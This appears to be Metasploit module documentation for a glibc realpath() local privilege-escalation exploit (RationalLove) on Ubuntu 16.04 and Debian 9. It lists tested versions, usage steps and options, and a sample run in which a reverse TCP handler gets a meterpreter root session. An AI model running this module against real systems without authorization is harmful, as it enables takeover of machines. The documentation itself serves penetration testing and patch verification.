## Description

  This module attempts to gain root privileges on Linux systems by abusing
  a vulnerability in GNU C Library (glibc) version 2.26 and prior.

  This module uses halfdog's RationalLove exploit to exploit a buffer
  underflow in glibc realpath() and create a SUID root shell. The exploit
  has offsets for glibc versions `2.23-0ubuntu9` and `2.24-11+deb9u1`.

  The target system must have unprivileged user namespaces enabled.


## Vulnerable Application

  This module has been tested successfully on:

  * Ubuntu Linux 16.04.3 (x86_64) with glibc version `2.23-0ubuntu9`
  * Debian 9.0 (x86_64) with glibc version `2.24-11+deb9u1`


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/glibc_realpath_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)

  **COMPILE**

  Options: `Auto` `True` `False` (default: `Auto`)

  Whether the exploit should be live compiled with `gcc` on the target system,
  or uploaded as a pre-compiled binary.

  `Auto` will first determine if `gcc` is installed to compile live on the system,
  and fall back to uploading a pre-compiled binary.


## Scenarios

  ```
  msf5 > use exploit/linux/local/glibc_realpath_priv_esc 
  msf5 exploit(linux/local/glibc_realpath_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/glibc_realpath_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.DhRxy0FQR.c' (35470 bytes) ...
  [*] Writing '/tmp/.Piya56UZVV' (207 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (853256 bytes) to 172.16.191.171

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.171
  OS           : Ubuntu 16.04 (Linux 4.10.0-28-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  ```

